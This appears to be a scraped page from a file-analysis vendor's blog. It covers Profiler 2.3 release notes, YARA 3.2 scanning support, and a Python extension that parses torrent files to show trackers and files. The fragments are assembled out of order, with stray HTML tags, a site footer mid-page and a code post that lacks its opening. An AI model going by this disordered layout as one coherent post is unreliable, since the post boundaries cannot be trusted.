<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark"><time class="entry-date published" datetime="2015-06-01T08:09:04+00:00">June 1, 2015</time><time class="updated" datetime="2021-04-01T16:34:10+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/headers/" rel="tag">Headers</a>, <a href="https://blog.cerbero.io/tag/pdb/" rel="tag">PDB</a>, <a href="https://blog.cerbero.io/tag/python/" rel="tag">Python</a>, <a href="https://blog.cerbero.io/tag/sdk/" rel="tag">SDK</a></span><span class="comments-link"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/#respond">Leave a comment<span class="screen-reader-text"> on PDB support (including export of types)</span></a></span> </footer>
</article><b><s id="classCWnd" type="CRuntimeClass const">
<article id="post-1519" class="post-1519 post type-post status-publish format-standard hentry category-suite-standard tag-news">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark">Profiler 2.3</a></h2> </header>
<div class="entry-content"> <p>Profiler 2.3 is out with the following news:</p> <p>– <a href="/?p=1506">introduced YARA 3.2 support</a><br> – <a href="#lgroups">added groups for logic providers</a><br> – <a href="#enctxt">added Python action to encode/decode text</a><br> – <a href="#x2t">added Python action to strip XML down to text</a><br> – <a href="#fixfont">added the possibility to choose the fixed font</a><br> – <a href="#colrand">added color randomization for structs and intervals</a><br> – <a href="#repapis">added close report and quit APIs</a><br> – <a href="#repapis">exposed more methods of the Report class (including save)</a><br> – improved indentation handling in the script editor<br> – <a href="#outsync">synchronized main and workspace output views</a><br> – improved output view<br> – updated libmagic to 5.21<br> – updated Capstone to 3.0<br> – many small improvements<br> – fixed libmagic on Linux<br> – removed the tray icon<br> – minor bug fixes</p> <p><a name="lgroups"></a></p> <h2>Logic provider groups</h2> <p>Logic providers can now be grouped in order to avoid clutter in the main window. Adding the following line to an existing logic provider will result in a new group being created:</p> <pre lang="python">group = Extra</pre> <p><a href="/wp-content/uploads/2014/12/23/lgroups.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/lgroups.png"></a></p> <p><a name="enctxt"></a></p> <h2>Encode/decode text action</h2> <p>A handy Python action to convert from hex to text and vice versa using all of Python’s supported encodings. Open a hex or text view and run the ‘Bytes to text’ or ‘Text to bytes’ action.</p> <p><a href="/wp-content/uploads/2014/12/23/enctext.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/enctext.png"></a></p> <p>The operation opens a new text or hex view, depending on whether it was a decoding or an encoding.
</p> <p><a name="x2t"></a></p> <h2>XML to text action</h2> <p>Strips the tags from an XML document and displays only the text. The action can be performed on both hex and text views. </p> <p><a href="/wp-content/uploads/2014/12/23/x2t.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/x2t.png"></a></p> <p>It opens a new text view. This is useful to view the text of a DOCX or ODT document. In the future the preview for these documents will be made available automatically, but in the meantime this action is helpful.</p> <p><a href="/wp-content/uploads/2014/12/23/docxprev.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/docxprev.png"></a></p> <p><a name="fixfont"></a></p> <h2>Fixed font preferences</h2> <p>The fixed font used in most views can now be chosen from the ‘General’ settings.</p> <p><a name="colrand"></a></p> <h2>Struct/intervals color randomization</h2> <p>When adding a structure or interval to the hex view, the chosen color is now randomized every time the dialog shows up. This behaviour can be disabled from the dialog itself and it’s also possible to randomize the color again by clicking on the specific refresh button.</p> <p><a href="/wp-content/uploads/2014/12/23/colrand.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/23/colrand.png"></a></p> <p>Manually picking a different color for every interval is time-consuming, so this feature should speed up raw data analysis.</p> <p><a name="repapis"></a></p> <h2>Report APIs</h2> <p>Most of the report APIs have been exposed (check out the SDK documentation). This, combined with the newly introduced ‘quit’ SDK method, can be used to perform custom scans programmatically and save the resulting report.</p> <p>Here’s a small example which can be launched from the command line:</p> <pre lang="python">from Pro.Core import *
import sys

ctx = proCoreContext()

def init():
    # add the file passed on the command line to the scan
    ctx.getSystem().addFile(sys.argv[1])
    return True

def rload():
    # registered as the last callback: saves the report and quits
    ctx.unregisterLogicProvider("test_logic")
    ctx.getReport().saveAs("auto.cpro")
    ctx.quit()

ctx.registerLogicProvider("test_logic", init, None, None, None, rload)
ctx.startScan("test_logic")</pre> <p>The command line syntax to run this script would be:</p> <pre lang="text">cerpro -r scan.py [file to scan]</pre> <p>The UI will show up and close automatically once the ‘quit’ method is called. Running this script in console mode using the ‘-c’ parameter is not yet possible, because of the differences in message handling on different platforms, but it will be in the future.</p> <p><a name="outsync"></a></p> <h2>Synchronized output views</h2> <p>The output views of the main window and of the workspace are now synchronized, so important log messages printed in one context are no longer missed in the other.</p> <p>Enjoy!</p></div><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-3/" rel="bookmark"><time class="entry-date published" datetime="2014-12-27T02:16:53+00:00">December 27, 2014</time><time class="updated" datetime="2021-04-01T16:34:49+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-3/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.3</span></a></span> </footer>
</article>
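<p>The ‘Bytes to text’ and ‘Text to bytes’ actions described in the Profiler 2.3 post above build on Python’s encodings. The following is only a sketch of the same kind of conversion with the standard library; the function names are hypothetical and this is not the code of the actions themselves.</p>

```python
def bytes_to_text(hex_string, encoding="utf-8"):
    """Decode a string of hex digits into text."""
    return bytes.fromhex(hex_string).decode(encoding)

def text_to_bytes(text, encoding="utf-8"):
    """Encode text and return the resulting bytes as a hex string."""
    return text.encode(encoding).hex()

print(bytes_to_text("48656c6c6f"))          # Hello
print(text_to_bytes("Hello", "utf-16-le"))  # 480065006c006c006f00
```

<p>Any encoding name accepted by Python can be passed as the second argument.</p>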
<article id="post-1506" class="post-1506 post type-post status-publish format-standard hentry category-action category-suite-standard tag-signatures tag-yara">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark">YARA 3.2.0 support</a></h2> </header>
<div class="entry-content"> <p>The upcoming 2.3 version of Profiler includes support for the latest YARA engine. This new release is scheduled for the first week of January and it will include YARA on all supported platforms.</p> <p>One inherent technical advantage of having YARA support in Profiler is that it will be possible to scan for YARA rules inside embedded files/objects, like files in a Zip archive, in a CHM file, in an OLEStream, streams in a PDF, etc.</p> <p>The YARA engine itself has been compiled with all standard modules (except for cuckoo). Even the <strong>magic</strong> module is available, since libmagic is also supported by Profiler.</p> <p>The initial YARA integration comes as a hook extension, an action and Python SDK support. The YARA Python support is the official one; the only difference is the import statement. You can run existing YARA Python code without modification by using the following import syntax:</p> <pre lang="python">import Pro.yara as yara</pre> <p>So let’s start a YARA scan. To do that, we need to enable the YARA hook extension. On Windows, remember to configure Python if you haven’t yet, since all extensions have been written in it.</p> <p><a href="/wp-content/uploads/2014/12/yara/1.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/1.png"></a></p> <p>When a scan is started, a YARA settings dialog will show up. </p> <p><a href="/wp-content/uploads/2014/12/yara/2.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/2.png"></a></p> <p>This dialog lets us choose various settings including the type of rules to load.</p> <p><a href="/wp-content/uploads/2014/12/yara/3.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/3.png"></a></p> <p>There are four possibilities:
a simple text field containing YARA rules, a plain text rules file, a compiled rules file, or a custom expression which must <strong>eval</strong> to a valid <strong>Rules</strong> object.</p> <p>The report settings specify how we will be alerted of matches. The ‘only matches’ option makes sure that only files (or their sub-files) with a match will be included in the final report. The ‘add to meta-data’ option causes the matches to be visible as meta-data strings of a file. The ‘as threats’ option reports every match as a 100% risk threat. The ‘print to output’ option prints the matches to the output view.</p> <p>Since we had the ‘only matches’ option enabled, we will find only matching files in our final report.</p> <p><a href="/wp-content/uploads/2014/12/yara/4.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/4.png"></a></p> <p>And since we also had the ‘add to meta-data’ option enabled, we will see the matches when opening a file in the workspace.</p> <p><a href="/wp-content/uploads/2014/12/yara/5.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/5.png"></a></p> <p>The YARA scan functionality is also available as an action in a hex view. You can either scan the whole hex data or select a range. 
Then press Ctrl+R to run an action and select ‘YARA scan’.</p> <p><a href="/wp-content/uploads/2014/12/yara/6.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/6.png"></a></p> <p>In this case we won’t be given report options, since the only thing which can be performed is to print out matches in the output view.</p> <p><a href="/wp-content/uploads/2014/12/yara/7.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/7.png"></a></p> <p>Like this:</p> <p><a href="/wp-content/uploads/2014/12/yara/8.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/8.png"></a></p> <p>Of course, all supported platforms come also with the official YARA command line utility.</p> <p><a href="/wp-content/uploads/2014/12/yara/9.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2014/12/yara/9.png"></a></p> <p>Since this has been a customer request for quite some time, I think it will be appreciated by some of our users.</p></div><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark"><time class="entry-date published" datetime="2014-12-26T02:19:13+00:00">December 26, 2014</time><time class="updated" datetime="2021-04-01T16:35:26+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/action/" rel="category tag">Action</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/signatures/" rel="tag">signatures</a>, <a href="https://blog.cerbero.io/tag/yara/" rel="tag">YARA</a></span><span class="comments-link"><a href="https://blog.cerbero.io/yara-3-2-0-support/#respond">Leave a comment<span class="screen-reader-text"> on YARA 3.2.0 support</span></a></span> </footer>
</article>
<aside id="secondary" class="sidebar widget-area">
<section id="archives-4" class="widget widget_archive"><h2 class="widget-title">Archives</h2> <label class="screen-reader-text" for="archives-dropdown-4">Archives</label>
<select id="archives-dropdown-4" name="archive-dropdown">
</select>
<script>(function(){
var dropdown=document.getElementById("archives-dropdown-4");
function onSelectChange(){
if(dropdown.options[ dropdown.selectedIndex ].value!==''){
document.location.href=this.options[ this.selectedIndex ].value;
}}
dropdown.onchange=onSelectChange;
})();</script>
</section> </aside><footer id="colophon" class="site-footer">
<nav class="main-navigation" aria-label="Footer Primary Menu">
<div class="menu-main-container"><ul id="menu-main-1" class="primary-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1923"><a href="https://cerbero.io">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2790"><a href="#">Products</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2181"><a href="https://cerbero.io/suite/">Cerbero Suite</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2183"><a href="https://cerbero.io/engine/">Cerbero Engine</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2567"><a href="https://cerbero.io/packages/">Packages</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2430"><a href="https://cerbero.io/e-zine/">E-Zine</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1926"><a href="/">Blog</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-2791"><a href="#">Support</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3000"><a href="https://cerbero.io/manual/">User Manual</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2165"><a href="https://sdk.cerbero.io/">SDK Documentation</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2514"><a href="https://cerbero.io/faq/">FAQ</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1927"><a href="https://cerbero.io/resources/">Resources</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1930"><a href="https://cerbero.io/contact/">Contact</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children 
menu-item-2792"><a href="https://cerbero.io/shop/">Shop</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1928"><a href="https://cerbero.io/my-account/">My account</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1929"><a href="https://cerbero.io/cart/">Cart</a></li> </ul> </li> </ul></div></nav>
<div class="site-info"> <span class="site-title"><a href="https://blog.cerbero.io/" rel="home">Cerbero Blog</a></span> <a href="https://wordpress.org/" class="imprint"> Proudly powered by WordPress </a></div></footer><script type="speculationrules">{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"\/*"},{"not":{"href_matches":["\/wp-*.php","\/wp-admin\/*","\/wp-content\/uploads\/*","\/wp-content\/*","\/wp-content\/plugins\/*","\/wp-content\/themes\/twentysixteen-child\/*","\/wp-content\/themes\/twentysixteen\/*","\/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}</script>
<script src="//blog.cerbero.io/wp-content/cache/wpfc-minified/e5g10mzi/a6zsp.js"></script>
<script id="enlighterjs-js-after">!function(e,n){if("undefined"!=typeof EnlighterJS){var o={"selectors":{"block":"pre","inline":"code"},"options":{"indent":4,"ampersandCleanup":true,"linehover":false,"rawcodeDbclick":false,"textOverflow":"scroll","linenumbers":false,"theme":"enlighter","language":"generic","retainCssClasses":false,"collapse":false,"toolbarOuter":"","toolbarTop":"{BTN_RAW}{BTN_COPY}{BTN_WINDOW}{BTN_WEBSITE}","toolbarBottom":""}};(e.EnlighterJSINIT=function(){EnlighterJS.init(o.selectors.block,o.selectors.inline,o.options)})()}else{(n&&(n.error||n.log)||function(){})("Error: EnlighterJS resources not loaded yet!")}}(window,console);</script></s></b></hex><table id="1"></table></hl></ui>
<pre lang="python">class TorrentObject(CFFObject):

    # ...

    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
            al = d[b"announce-list"]
            for a in al:
                # check the type before the set lookup: an unhashable a[0] would raise
                if type(a) is list and len(a) > 0 and type(a[0]) is bytes and a[0] not in dup:
                    trackers.append(a[0])
                    dup.add(a[0])
        return trackers

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("&lt;ui&gt;&lt;hl margin='0'&gt;&lt;table id='1'/&gt;&lt;/hl&gt;&lt;/ui&gt;")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        return False</pre>
<p><a href="/wp-content/uploads/2015/09/torrent/trackers.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/torrent/trackers.png" alt="Trackers"></a></p>
<p>When retrieving data from the dictionary, we also make sure that it is of the correct type, so that the code which handles this data won't raise an exception when it encounters an unexpected type.</p>
<p>And now the files:</p>
<pre lang="python">class TorrentObject(CFFObject):

    # ...

    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d:
            # single-file torrent: name and length are stored directly in "info"
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            # multi-file torrent: every entry of "files" has its own path and length
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("&lt;ui&gt;&lt;hl margin='0'&gt;&lt;table id='1'/&gt;&lt;/hl&gt;&lt;/ui&gt;")
            sdata.setCallback(filesViewCb, self.obj.GetFiles())
            return True
        return False</pre>
<p><a href="/wp-content/uploads/2015/09/torrent/files.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/torrent/files.png" alt="Files"></a></p>
<p>And that's it. Here is the whole code again for a better overview:</p>
<pre lang="python">from Pro.Core import *
from Pro.UI import pvnInit, pvnGetTableRow
import pprint

MAX_TORRENT_SIZE = 10485760 # 10 MBs

#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#

# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License).
# You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.

# Written by Petru Paler

def decode_int(x, f):
    f += 1
    newf = x.index(0x65, f)
    n = int(x[f:newf])
    if x[f] == 0x2D: # -
        if x[f + 1] == 0x30:
            raise ValueError
    elif x[f] == 0x30 and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(0x3A, f) # :
    n = int(x[f:colon])
    if x[f] == 0x30 and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 0x65: # e
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 0x65: # e
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        return {}
    if l != len(x):
        return {}
    return r

#
# END OF 3RD PARTY CODE
#

class TorrentObject(CFFObject):

    def __init__(self):
        super(TorrentObject, self).__init__()
        self.SetObjectFormatName("TORRENT")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)
        self.tdict = None

    def GetDictionary(self):
        # decode the file only once and cache the result
        if self.tdict is None:
            size = min(self.GetSize(), MAX_TORRENT_SIZE)
            data = self.Read(0, size)
            self.tdict = bdecode(bytes(data))
        return self.tdict

    def CreationDate(self):
        d = self.GetDictionary()
        cd = d.get(b"creation date", None)
        if cd is None or not type(cd) is int:
            return NTDateTime()
        return NTDateTime.fromMSecsSinceEpoch(cd * 1000)

    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
            al = d[b"announce-list"]
            for a in al:
                # check the type before the set lookup: an unhashable a[0] would raise
                if type(a) is list and len(a) > 0 and type(a[0]) is bytes and a[0] not in dup:
                    trackers.append(a[0])
                    dup.add(a[0])
        return trackers

    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d:
            # single-file torrent: name and length are stored directly in "info"
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            # multi-file torrent: every entry of "files" has its own path and length
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0

def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    def __init__(self):
        super(TorrentScanProvider, self).__init__()
        self.obj = None
        self.meta_keys = [b"created by", b"creation date", b"comment"]
        # format item IDs
        self.FormatItem_Dictionary = 1
        self.FormatItem_Trackers = 2
        self.FormatItem_Files = 3
        # format item names
        self.fi_names = ["Dictionary", "Trackers", "Files"]

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TorrentObject()
        self.obj.Load(self.getStream())
        d = self.obj.GetDictionary()
        return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR

    def _startScan(self):
        d = self.obj.GetDictionary()
        if any(mk in d for mk in self.meta_keys):
            e = ScanEntryData()
            e.category = SEC_Privacy
            e.type = CT_MetaData
            self.addEntry(e)
        if self.obj.GetSize() > MAX_TORRENT_SIZE:
            e = ScanEntryData()
            e.category = SEC_Warn
            e.type = CT_UnaccountedSpace
            self.addEntry(e)
        return self.SCAN_RESULT_FINISHED

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_MetaData:
            d = self.obj.GetDictionary()
            out = proTextStream()
            for mk in self.meta_keys:
                if mk in d:
                    tmk = mk.decode("utf-8", errors="ignore")
                    if tmk == "creation date":
                        dt = self.obj.CreationDate()
                        tmv = dt.toString() if dt.isValid() else "?"
                    else:
                        tmv = d[mk].decode("utf-8", errors="ignore")
                    out._print(tmk)
                    out._print(": ")
                    out._print(tmv)
                    out.nl()
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData(out.buffer)
            return True
        elif sdata.type == CT_UnaccountedSpace:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,))
            return True
        return False

    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, self.FormatItem_Dictionary)
        ft.appendChild(fi, self.FormatItem_Trackers)
        ft.appendChild(fi, self.FormatItem_Files)
        return ft

    def _formatViewInfo(self, finfo):
        # both bounds must hold, otherwise the lookup below could go out of range
        if finfo.fid >= 1 and finfo.fid - 1 < len(self.fi_names):
            finfo.text = self.fi_names[finfo.fid - 1]
            return True
        return False

    def _formatViewData(self, sdata):
        if sdata.fid == self.FormatItem_Dictionary:
            sdata.setViews(SCANVIEW_TEXT)
            txt = pprint.pformat(self.obj.GetDictionary())
            sdata.data.setData(txt)
            return True
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("&lt;ui&gt;&lt;hl margin='0'&gt;&lt;table id='1'/&gt;&lt;/hl&gt;&lt;/ui&gt;")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("&lt;ui&gt;&lt;hl margin='0'&gt;&lt;table id='1'/&gt;&lt;/hl&gt;&lt;/ui&gt;")
            sdata.setCallback(filesViewCb, self.obj.GetFiles())
            return True
        return False

def torrentAllocator():
    return TorrentScanProvider()</pre>
<p>We could still extract more information from the torrent file. For instance, we could show the list of hashes and which portion of which file each of them belongs to.
If that's interesting for forensic purposes, we can easily add this view in the future.</p><footer class="entry-footer"> <span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/torrent-support/" rel="bookmark"><time class="entry-date published" datetime="2015-09-23T16:50:31+00:00">September 23, 2015</time><time class="updated" datetime="2021-04-01T16:32:00+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/forensics/" rel="category tag">Forensics</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/p2p/" rel="tag">P2P</a>, <a href="https://blog.cerbero.io/tag/torrent/" rel="tag">Torrent</a>, <a href="https://blog.cerbero.io/tag/trackers/" rel="tag">Trackers</a></span><span class="comments-link"><a href="https://blog.cerbero.io/torrent-support/#respond">Leave a comment<span class="screen-reader-text"> on Torrent Support</span></a></span> </footer><article id="post-1551" class="post-1551 post type-post status-publish format-standard hentry category-suite-standard"> <header class="entry-header"> <h2 class="entry-title"><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark">Scan Providers</a></h2> </header> <div 
class="entry-content"> <p>Version 2.5.0 is close to being released and comes with the last type of extension exposed to Python: scan providers. Scan provider extensions are not only the most complex type of extension, but also the most powerful, as they make it possible to add support for new file formats entirely from Python! </p>
